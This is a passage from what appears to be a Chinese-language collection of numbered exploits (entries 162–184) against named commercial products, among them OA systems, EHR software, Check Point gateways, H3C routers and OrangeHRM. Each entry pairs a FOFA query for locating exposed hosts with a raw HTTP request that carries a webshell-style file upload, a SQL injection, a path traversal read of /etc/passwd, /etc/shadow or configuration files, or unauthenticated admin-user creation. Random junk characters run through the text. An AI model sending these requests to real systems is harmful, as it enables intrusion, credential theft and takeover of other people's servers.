+ o; t6 ~1 a7 R3 }/ NHost: x.x.x.x
, K5 s- H) H1 `( S+ ?7 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
( D7 g8 a. G" I% f4 D" V; eConnection: close5 `& d8 J) G- K. B3 @7 ^2 l
Content-Length: 445
3 o+ P$ @8 o. j& `7 G$ LContent-Type: text/xml
% P8 N1 L7 |, g6 AAccept-Encoding: gzip) J+ P: H! d5 Z6 w' Q ?9 @
. Y+ z/ C: ~! O# f- }<?xml version="1.0" encoding="utf-8"?>
, g. F) a. g2 U' ?6 A6 t, k<soap:Envelope xmlns:xsi="
: z$ r9 u5 j( y5 o# m# ?1 Xhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
6 v y9 A6 b* M1 M+ m' S fxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' L0 Y& I* ~8 Z
<soap:Body>! a3 M! u% P6 f& j& p( Y
<UploadResume xmlns="http://tempuri.org/">
( R6 e- n# {9 u) e5 q" q) y<ip>1</ip>+ a2 c- r# Z& N$ A8 ~2 U$ Y
<fileName>../../../../dizxdell.aspx</fileName>
& ?' f3 \3 c; E" Z<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>$ c0 w! l" ^( f3 K$ f- @- l
<tag>3</tag>
4 S) A! a) M3 F$ O: }</UploadResume>
- r# e2 u6 T; c4 H% u, I5 N</soap:Body>
4 F5 ]7 ?2 U- ]5 o$ j</soap:Envelope>' U9 V Q0 u/ ?
* M2 X* S* ^ ?; f
) j. c! T( t! q+ }3 \http://x.x.x.x/dizxdell.aspx
* \$ L1 J0 P `5 `8 B
/ Z) h( n: m; a" ~8 ^1 ?3 t: e. _3 P162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
( s: l8 S. i G( |' }2 r; uFOFA: app="和丰山海-数字标牌"
% K: V# V( \# L Y6 p; ]/ Y% }2 L+ pPOST /QH.aspx HTTP/1.17 h# A. {' `- ^. S
Host: x.x.x.x- P/ v7 }3 E+ ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
/ \% p$ T" y! _- R7 l+ qConnection: close2 c8 D5 e( @, S4 K% u$ _
Content-Length: 5833 v9 g/ G6 J* @4 ]$ u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
% w% N5 [" h! K- R1 i( A/ lAccept-Encoding: gzip
: }5 g! x# r0 a
0 R0 |7 x. g' l! [' c9 n3 J------WebKitFormBoundaryeegvclmyurlotuey
2 q7 l* q( L* \Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"9 Q& ^2 p9 a& B; s* B/ M7 ]
Content-Type: application/octet-stream
3 o& D! `# R k; q1 Y9 b
" Z, [4 C3 ]% O2 R/ F. e<% response.write("ujidwqfuuqjalgkvrpqy") %>3 v. s/ t" M5 s2 L# B) d
------WebKitFormBoundaryeegvclmyurlotuey& x# T b, J7 x' q: h0 J
Content-Disposition: form-data; name="action"; q8 w1 S6 `1 e) O! c4 m; V: q
" U" H+ N" Z3 W Z8 H2 L
upload
; x" ^9 y2 C' U. J6 J------WebKitFormBoundaryeegvclmyurlotuey
+ Q8 s8 n1 O& H* b2 m" SContent-Disposition: form-data; name="responderId"4 ^& n: m U) x' V) k+ Y0 R( x
7 `1 @4 _' y" T( c3 l- _, uResourceNewResponder
, L9 R0 D( w7 l1 T: H------WebKitFormBoundaryeegvclmyurlotuey
' c$ V! }, w3 V) X+ M7 AContent-Disposition: form-data; name="remotePath"* f1 D0 ?1 u& t* m$ i; i* E Z( N
# Q* K) \. _/ t" v I/opt/resources
4 p8 ?. `* n* p0 e------WebKitFormBoundaryeegvclmyurlotuey--8 y- V+ j; V$ c2 A @5 i
( ]0 _. U! R* {+ L
( c" j$ l8 `! r" P5 |: Q& m8 e7 vhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
3 v' N# L2 J" P% D& H8 y4 y
6 }. P% p9 l7 q2 A163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
8 S/ p7 T! w) Q# K9 u4 `& ^8 rFOFA: icon_hash="-795291075"
2 _0 G" z7 E7 c' o, ~1 aPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
% {5 x. _4 }( t6 aHost: x.x.x.x
" B5 s; x7 F* Z2 g1 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) h: p- K/ X: g" p$ B, W! ~
Connection: close1 e8 r7 W L+ W7 A) C2 o0 V
Content-Length: 293) A, F. c# z4 `- R6 I
Accept: */*) z; w: m% r( @
Accept-Encoding: gzip, deflate
. E# `3 w; Q5 l0 h7 m# SAccept-Language: zh-CN,zh;q=0.9 F- Z( C5 A( x( _1 f: `( E
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
# s' c; f) J N
8 n6 u" s5 P" Q$ d j------iiqvnofupvhdyrcoqyuujyetjvqgocod; X- r- D2 O, x
Content-Disposition: form-data; name="name"
+ I# } F# I% d2 S1 ?/ {4 F `
' R& a0 l1 j5 H; Z( J& j S1.php4 ~0 K$ X2 E. F: e+ \
------iiqvnofupvhdyrcoqyuujyetjvqgocod' c: K/ U" |! }3 X8 k+ B( d- W
Content-Disposition: form-data; name="upfile"; filename="1.php"
5 J# r( n" `$ Q, X+ U0 ?Content-Type: image/jpeg, ], r+ R5 d. I3 Q
' Q7 h- \6 g7 t
rvjhvbhwwuooyiioxega' b# N9 d2 O. L
------iiqvnofupvhdyrcoqyuujyetjvqgocod--5 T9 b; r2 r: r+ X. M
1 G( m7 v6 Z/ I+ Z8 U8 q
2 W: G* G7 Y+ ~! ]
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
' I$ x+ I" K) ?# I! \FOFA: title="智慧综合管理平台登入"2 N. m8 M7 j( s: N0 Z O
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
6 Q2 X+ K0 A3 AHost: x.x.x.x+ B, z" `( C2 Q* y+ h0 z# b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.04 Q: y6 ~. C* [) B$ l. A
Content-Length: 2887 D* {9 E2 ?, n5 k( ?
Accept: application/json, text/javascript, */*; q=0.01 Z$ P; C# D) x/ n7 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
3 c1 o) z% I& }3 Q+ z0 v9 AConnection: close) \9 q+ U# O+ f
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
, ?- b% Y% h3 r. fX-Requested-With: XMLHttpRequest
1 E3 [5 h4 R' t j2 L: O- PAccept-Encoding: gzip5 i: u3 C4 u, z; J
8 n% j$ O0 d8 \" U1 W: ]+ m------dqdaieopnozbkapjacdbdthlvtlyl& k" q7 ^4 B9 `/ p6 I
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx". h# v/ ]7 v3 w! |& R
Content-Type: image/jpeg
0 g5 ^6 ?9 Q2 K0 T( m
* B) ]/ `% w$ R0 R& v<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>/ o4 S+ [' g5 S- b7 x2 p
------dqdaieopnozbkapjacdbdthlvtlyl--# }1 g- L9 E" \8 K+ T
8 a$ ^( V1 x- h6 i8 T" Q2 }" B
8 a' L/ v3 ~0 U/ H1 l: c6 Dhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx# z" I2 Y& c7 ~) U( H" M4 q
$ b9 F3 Z+ J5 ?2 u+ z5 O! l165. OrangeHRM 3.3.3 SQL 注入
, i+ u4 f" ~( F: a2 I$ sCVE-2024-36428
5 v, A: T% d# w d; CFOFA: app="OrangeHRM-产品"
' |# h. U& A5 C l4 C& y4 yURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
7 Y9 H \0 k) J3 ^1 J, l+ d7 Z9 ~% l' D9 E9 u. z' S- D
4 S$ \" j0 V! Y0 R166. 中成科信票务管理平台SeatMapHandler SQL注入# [! x8 V- l. [3 a7 q5 k
FOFA:body="技术支持:北京中成科信科技发展有限公司"
8 d+ B" M8 G; n" b4 C4 pPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.18 D2 E# A6 I5 y) P7 i6 z4 J. t! B
Host: h5 L4 {- Y8 c1 h
Pragma: no-cache) z, w& M+ n4 P, E9 T' o
Cache-Control: no-cache2 X( D/ u+ b* F, F9 C
Upgrade-Insecure-Requests: 1
/ y/ ?2 u& b5 Z6 U7 H! K- r8 G$ \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
o; h. W* V( c5 A6 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ m' Y5 K4 n% l1 A. A( [$ C
Accept-Encoding: gzip, deflate
. M8 l& c* Z: b; eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8$ S C" f" Q8 n5 o. f1 T0 u
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
+ P- u1 {9 K: V0 qConnection: close
# u/ Y( C& |1 J& R8 B B! ]1 W9 ]Content-Type: application/x-www-form-urlencoded# P+ F. o* Y6 i3 |2 ^2 ?
Content-Length: 89
' t) C$ _1 Y; {: r; r5 }* V: F2 v
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE; m, U, ?3 @9 w, \! u2 e; W! Y
- W' v& s* _ f- a# ? d9 q$ V
# j$ j/ n6 n% o, Y167. 精益价值管理系统 DownLoad.aspx任意文件读取% f, @; B; L+ N0 _# h/ K
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
5 k) z2 H% V5 M; KGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
4 A# U8 O( n; E2 c. lHost:
M# j. `1 w7 e' I" z* DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* y1 N7 d0 S' @ z$ w5 vContent-Type: application/x-www-form-urlencoded* \; x7 y. j. a% z' Y3 f& ^
Accept-Encoding: gzip, deflate
: g6 S$ k8 w% q. tAccept: */*
% D0 A. H$ O4 i( h% y! }Connection: keep-alive
9 n Q9 X# h5 O. J( _7 u" L. ?
# A1 _% D7 f2 |- e5 z k3 N$ Y: G. g
+ \% B7 ]! i4 i$ X! @8 g168. 宏景EHR OutputCode 任意文件读取- u) Y/ m5 r" L9 ]
FOFA:app="HJSOFT-HCM"$ o3 ?( q8 _/ x# C7 Z8 Q
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.14 M: F3 z" u: M+ W- }
Host: your-ip Z: d& H& ~6 o. y$ e3 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
1 d# \! F* m, r! M# RContent-Type: application/x-www-form-urlencoded/ j$ [4 J% t$ r6 A( X( ^
Connection: close
% ^/ m; _' H- n$ r5 K+ I' z/ R( Y. e* N, ~
1 t9 e' g4 _8 k2 `6 G" }8 }' G
: w4 l1 k( q( _ M9 A
169. 宏景EHR downlawbase SQL注入/ t2 e4 I) R4 f- F) R7 r- V% W" z
FOFA:app="HJSOFT-HCM"
6 L9 u& r1 K6 WGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1$ Z5 e5 M" W. M! O% `1 C# m% F
Host: your-ip- Z; \' l8 B: J v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, r0 E# C/ Z% ~/ e2 k5 k0 v7 _Accept: */*: ?7 f; h0 U F1 r$ F
Accept-Encoding: gzip, deflate
8 U1 g" S" m6 k9 X3 UConnection: close' O: P4 A/ x! {
4 E/ d" {1 S P! T" a5 {' n
/ G5 h! {: N! V, |) g
5 V0 S4 }3 p9 B0 _; H k$ X5 }& m0 I+ G
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
! ?/ F6 W# W6 [, oFOFA:body="/general/sys/hjaxmanage.js"
' {7 m2 _2 q; z2 P2 Y6 g0 SPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
4 F$ W5 E" {. \& K7 E/ @Host: balalanengliang
' Y9 ?5 X# z z& [; RUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ ^" k$ G2 T" t6 _4 X. L3 I' jContent-Type: application/x-www-form-urlencoded4 o* }2 r" I4 C) R! o! y$ N
, k; r5 s* p9 B1 w* T. Rfilename=../webapps/ROOT/WEB-INF/web.xml
0 d- e8 O( T" F& d8 V6 M" ]5 r
2 h F; m3 y) I9 ^& P, M2 J9 c, a' ~( H( ]9 U
171. 通天星CMSV6车载定位监控平台 SQL注入6 \' u2 \; r3 h$ N# t
FOFA:body="/808gps/"
, ^9 d" c- P3 Y, ?" }: qGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
! V; x) w& _$ `% |Host: your-ip
* N" p N, t7 F# XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
0 O! j+ p$ V5 `2 S1 d6 ?Accept: */*9 W7 z: }' k+ p0 `/ c- o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 m7 ~, ~- q' u& M' @& R- J/ rAccept-Encoding: gzip, deflate
- E% u8 |: R* b* y+ fConnection: close6 L q2 y' x Y- ~& a) l
, l" ?# o l" J7 F1 C8 L, w
5 K+ j5 q; V0 t6 `- S* m a9 F- }: T
' t- o {: A% r3 K* {' Y172. DT-高清车牌识别摄像机任意文件读取. { y1 W) B6 T. U2 u1 X
FOFA:app="DT-高清车牌识别摄像机"3 Y6 f8 X" k& q0 w& ^0 I8 q
GET /../../../../etc/passwd HTTP/1.1" `4 r4 X, F, W, B L6 P" Q7 \) n
Host: your-ip) k2 \* k# z; v4 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ _) P) q0 D5 k l8 J3 ~8 gAccept-Encoding: gzip, deflate, }! n0 V" Y4 d+ p4 \& k
Accept: */*% C$ r& X* P9 i5 t8 D
Connection: keep-alive3 [7 w2 d: \: F* {8 W4 C# W
3 O' B; G9 u) ?* i- `8 q5 f& @
, E. u: q# C2 W3 q5 v
* @% u7 N7 \$ g' `- ] c6 i6 q173. Check Point 安全网关任意文件读取, J# S0 @# f% D" s
CVE-2024-24919
* \, `4 F0 Z9 |; J0 tFOFA:app="Check_Point-SSL-Network-Extender"
* ~; _6 {9 @ w5 mPOST /clients/MyCRL HTTP/1.16 e9 s2 J. @* z1 j# D- q* M" x
Host: your-ip
8 J% j3 g7 k' e! J+ d5 rContent-Type: application/x-www-form-urlencoded
( L6 c$ v7 L0 A3 P0 `' K: d9 t* I# A; I- u: s! F% W$ m/ G
aCSHELL/../../../../../../../etc/shadow
; ~/ V1 A& N3 K+ t3 |1 r" s6 ~- K/ e* ~2 C T0 p2 E
8 l4 ?; o9 X+ @/ Q- H
5 i( [) c! u( b1 o8 B174. 金和OA C6 FileDownLoad.aspx 任意文件读取
j {/ s+ d7 l, _ ]FOFA:app="金和网络-金和OA"
0 I6 l1 T) N* C9 TGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1) W: }! D, x* H8 x- p5 U" x
Host: your-ip
, p# O8 k6 W0 A8 s8 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: Z5 _ u7 A* l2 \5 ^8 ?: l4 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 ]8 E; m+ l+ K5 d7 R1 J& h, TAccept-Encoding: gzip, deflate, br, C. \2 }$ \( t) @! {" C: }
Accept-Language: zh-CN,zh;q=0.9# E" {5 o: Z' _( p0 U2 L! U9 d" ~
Connection: close
! ~/ d9 v' {) \; M X# ?7 }
" S1 D, j8 @% h! C) r8 D T, N" y. I2 q! |( }
* k: p2 V. }7 R( s8 v
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; N3 j9 ^0 m3 mFOFA:app="金和网络-金和OA"
3 D. A( e" B# T8 w: S, G& S' G8 K, z3 {GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1( y8 J5 K! ]5 C4 i
Host:4 ~8 n; i8 H9 C) W/ [$ ^
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 k4 p8 m% @" Z- }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, `- o) N) d% ~0 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. ]) a& l3 I! W+ ~2 r
Accept-Encoding: gzip, deflate6 a5 f6 k; Z$ L! J
Connection: close
4 Z) W7 t V1 p+ uUpgrade-Insecure-Requests: 19 z: l: c5 n8 v- O1 m5 e0 {4 B
0 i" _) D1 G# I( L2 e7 W% y0 D2 @) l) V
176. 电信网关配置管理系统 rewrite.php 文件上传' N5 E; q m1 S6 m
FOFA:body="img/login_bg3.png" && body="系统登录"/ a# `* ~% e* z0 y& R. q! w4 q
POST /manager/teletext/material/rewrite.php HTTP/1.1
- Q* |8 L2 B* G5 NHost: your-ip
. t0 j2 ?3 O7 U: b7 }/ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
/ m# W; _/ t2 l1 N5 m4 {3 G2 [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
% a) V! P( s9 v, C, H. cConnection: close
: C% ^- Q( ^6 D1 L& q. n7 X' |
; W! L; H) [: A3 p; h) H------WebKitFormBoundaryOKldnDPT
% k8 L& y! N$ M8 y8 P2 f7 m9 AContent-Disposition: form-data; name="tmp_name"; filename="test.php"' {% k/ c$ D* i8 E# A% o3 c
Content-Type: image/png
: f0 o/ t5 K3 \1 H9 @
% x3 }" X& k0 s G2 H- P( l<?php system("cat /etc/passwd");unlink(__FILE__);?>
# u: }6 H. p% p: w' A5 {------WebKitFormBoundaryOKldnDPT
& \ ]# m6 F6 P4 m2 u# ~6 m6 i. _Content-Disposition: form-data; name="uploadtime". m' D8 @1 D" k( Q: s L, r6 }
1 a y c) t4 y 3 e& N* y* N8 B3 j0 F# c1 h( v9 h% W6 y
------WebKitFormBoundaryOKldnDPT--; P& X+ a: ^/ }+ t% b
, I' i2 u' a, v# q! p, y% B; I
9 h% j1 e& R! p) W, q$ u+ q
- Q5 l4 ]. A# h. h9 w7 D177. H3C路由器敏感信息泄露
1 I. e$ d( g8 _* p ^( X* q: G/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg3 b ?% a+ H' {! i2 ~7 L' o
/userLogin.asp/../actionpolicy_status/../M60.cfg
/ x) V2 m7 x; J# m- Q+ _8 _8 @4 p1 y/userLogin.asp/../actionpolicy_status/../GR8300.cfg
- L+ n# ?" T) d5 @/userLogin.asp/../actionpolicy_status/../GR5200.cfg+ ~4 n4 l3 e* O5 L% w! }; a. E
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
4 s3 V$ G) j( R$ e4 X0 Z/userLogin.asp/../actionpolicy_status/../GR2200.cfg; L2 P' R8 p8 `; X
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg W% f1 F/ ^+ O8 @, _
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
5 J9 d* y8 R+ O% j/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg( Y4 P7 E9 j/ m4 I, s
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
' O8 J6 S: Z% i9 a% k/userLogin.asp/../actionpolicy_status/../ER5200.cfg% x5 Y) Z0 j5 t, d0 ]1 u, o
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
1 ^9 W N1 ^! D' S; q0 E* ?0 P1 I/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg+ `- {9 X9 X6 S5 h& Y
/userLogin.asp/../actionpolicy_status/../ER3260.cfg2 ~ Y- ]: _" R) L: f/ ]5 h
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
' H* l$ Q; n, o2 ]2 K2 L/userLogin.asp/../actionpolicy_status/../ER3200.cfg5 x$ k2 Z1 |% m( D! Y1 y
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg- {5 U1 [2 t( S0 I6 S( E- K/ Z
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg5 d$ u5 X5 p: U0 u [, v
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg* j* Z& C, ]: w
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
( u& S! h9 n" {8 c( e9 `/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg3 F: H: w! U* ~0 Z2 ^6 d- M
' W$ e* \* \* ?4 L3 w( | K
/ `0 H% \ d+ u178. H3C校园网自助服务系统-flexfileupload-任意文件上传# d' ?0 b$ |4 R) j/ K# A: I
FOFA:header="/selfservice"
; K, t8 {0 i0 W% L, A) {POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.17 N0 |) Z( e0 K$ @0 I5 {7 z7 Y. N) W
Host:
. ]1 u' r1 t0 T9 W* {6 m* ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' n) u" b& C& W, } z6 g, g
Content-Length: 252
; G: R( ~: s7 i/ ]2 _7 }! YAccept-Encoding: gzip, deflate- |- N' Y/ o/ ]- o' ?0 N7 N! l; A; Y; d
Connection: close
: u9 ]& U9 e, d( W! o) pContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
+ S$ e: N& D% ^$ A7 c/ t-----------------aqutkea7vvanpqy3rh2l9 L. K9 U, ~ c, o) ^
Content-Disposition: form-data; name="12234.txt"; filename="12234") B" g8 Y2 b' L
Content-Type: application/octet-stream
% y' r! }2 z! {+ Z. h' }! TContent-Length: 255$ \ S: q, A' [6 ~ Q+ f! [: v
% ]# W4 Y! @$ U7 @12234& y" `1 o' i! r4 i' B0 J( K, L$ y& @: x
-----------------aqutkea7vvanpqy3rh2l--
" }6 r3 o9 M! Y
: B9 c) i q& s5 |3 f" W& a
+ K% {) Z& t4 N' ^GET /imc/primepush/%2e%2e/flex/12234.txt
, T) O7 n. S. N7 }4 ^
: a2 c/ G. N( k
. B& b$ e! D0 a, _' S7 _179. 建文工程管理系统存在任意文件读取- b9 D' K5 A% `6 M! J
POST /Common/DownLoad2.aspx HTTP/1.1
& W' E$ v$ q% K, BHost: {{Hostname}}
1 } l5 \( N+ F, j6 [Content-Type: application/x-www-form-urlencoded
( g5 ?5 L0 F2 _4 T+ ?; p5 wUser-Agent: Mozilla/5.0
, ^6 i. ~* q. g1 E7 _, v/ g: T5 P
path=../log4net.config&Name=6 P* y2 Q6 I( u* s3 D
7 v# f- F: ~, q' A
; z9 s' H0 e2 q
180. 帮管客 CRM jiliyu SQL注入4 N4 {- S, m# u
FOFA:app="帮管客-CRM"
# B, @# x0 j( }1 O3 B* y# s1 nGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.15 M! @$ T2 _0 }3 f7 F) ]' R
Host: your-ip- N8 g& ]% D/ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! l0 t7 `1 O" g9 Z. e3 F, N: J5 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, X% L. g% E) ]! t
Accept-Encoding: gzip, deflate
# \; q! S3 C) M9 c& i# A2 J# MAccept-Language: zh-CN,zh;q=0.9# O$ M+ i: M. b. K9 n0 M4 E! |
Connection: close/ {: t4 n7 B8 O$ X& V+ ^
8 N% k+ O8 ]' I* u) T
! s+ o+ x1 B2 l' M6 l w
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
% v3 N0 v& v9 s. a# m! t# X# rFOFA:"PDCA/js/_publicCom.js"
% g! g" i0 v( c% JPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
' G2 B% u$ A& s! v% c5 i* @7 C) KHost: your-ip# B- B4 k$ A; K( S% H% N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
9 R/ L) y& \, G( t" z0 d# mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 m# T! ?7 @ ?8 o e, P; ~6 X/ y' rAccept-Encoding: gzip, deflate, br
3 f; K: ^* e# {/ V- ^Accept-Language: zh-CN,zh;q=0.9
6 r$ _4 e6 M4 J' V$ uConnection: close) s$ j! H1 }$ G% ?
Content-Type: application/x-www-form-urlencoded
_' f" I9 p# c6 |0 N7 p7 A% f {9 K6 ]
9 F5 q7 n {" Q& }4 ~# `action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20' t: m% n7 p) d) T+ `
$ S3 g( u" i' W, K$ j r
+ i [7 u) b, _3 w0 M182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 Q/ u. B8 N. l8 J, F* j2 tFOFA:"PDCA/js/_publicCom.js"' P0 n: |3 }5 K) z4 B
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1: C* ~) b: C% l* _
Host: your-ip2 _2 X" D) l# H% K/ \0 o! M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ a2 A% `% Q1 R# fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; D7 M- e: l/ f) ]1 P
Accept-Encoding: gzip, deflate, br
' R- s8 y7 |* HAccept-Language: zh-CN,zh;q=0.9# c, @0 r5 T& _
Connection: close
- F9 G# `/ S* I) kContent-Type: application/x-www-form-urlencoded
: {9 u% x! [' R8 T
) H8 I% G! K: k
/ ^4 o/ D( A8 P) busername=test1234&pwd=test1234&savedays=1
\# u+ T( d# J4 U9 Z1 M/ w( k1 J9 o9 o. {- x
9 |3 c4 [9 h) o5 I* b4 M183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入9 ? A; g9 n5 x! e
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
/ }$ r3 [" M) M* x+ CGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
0 I2 \6 S7 ^' HHost: your-ip% Z0 ?* _. Q: ]% [( Q- M! d
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 t* A1 y% [, e/ S
Accept-Charset: utf-8
! b& {) _$ Y* R# K$ i" w: e2 r, r- SAccept-Encoding: gzip, deflate0 H; }7 f, r- _5 i; C) a: Q* `
Connection: close
% J7 z6 D7 Z. M" v0 g5 L5 r, h3 [+ M. r
, b6 ~' `. X! d4 }, I
4 y8 w2 P( s2 e184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
) r4 g. S; h' dFOFA:server="SunFull-Webs"
7 `; J! h6 |3 S/ z1 o0 KPOST /soap/AddUser HTTP/1.10 T( [8 {" I; ?8 {, y9 {) L
Host: your-ip
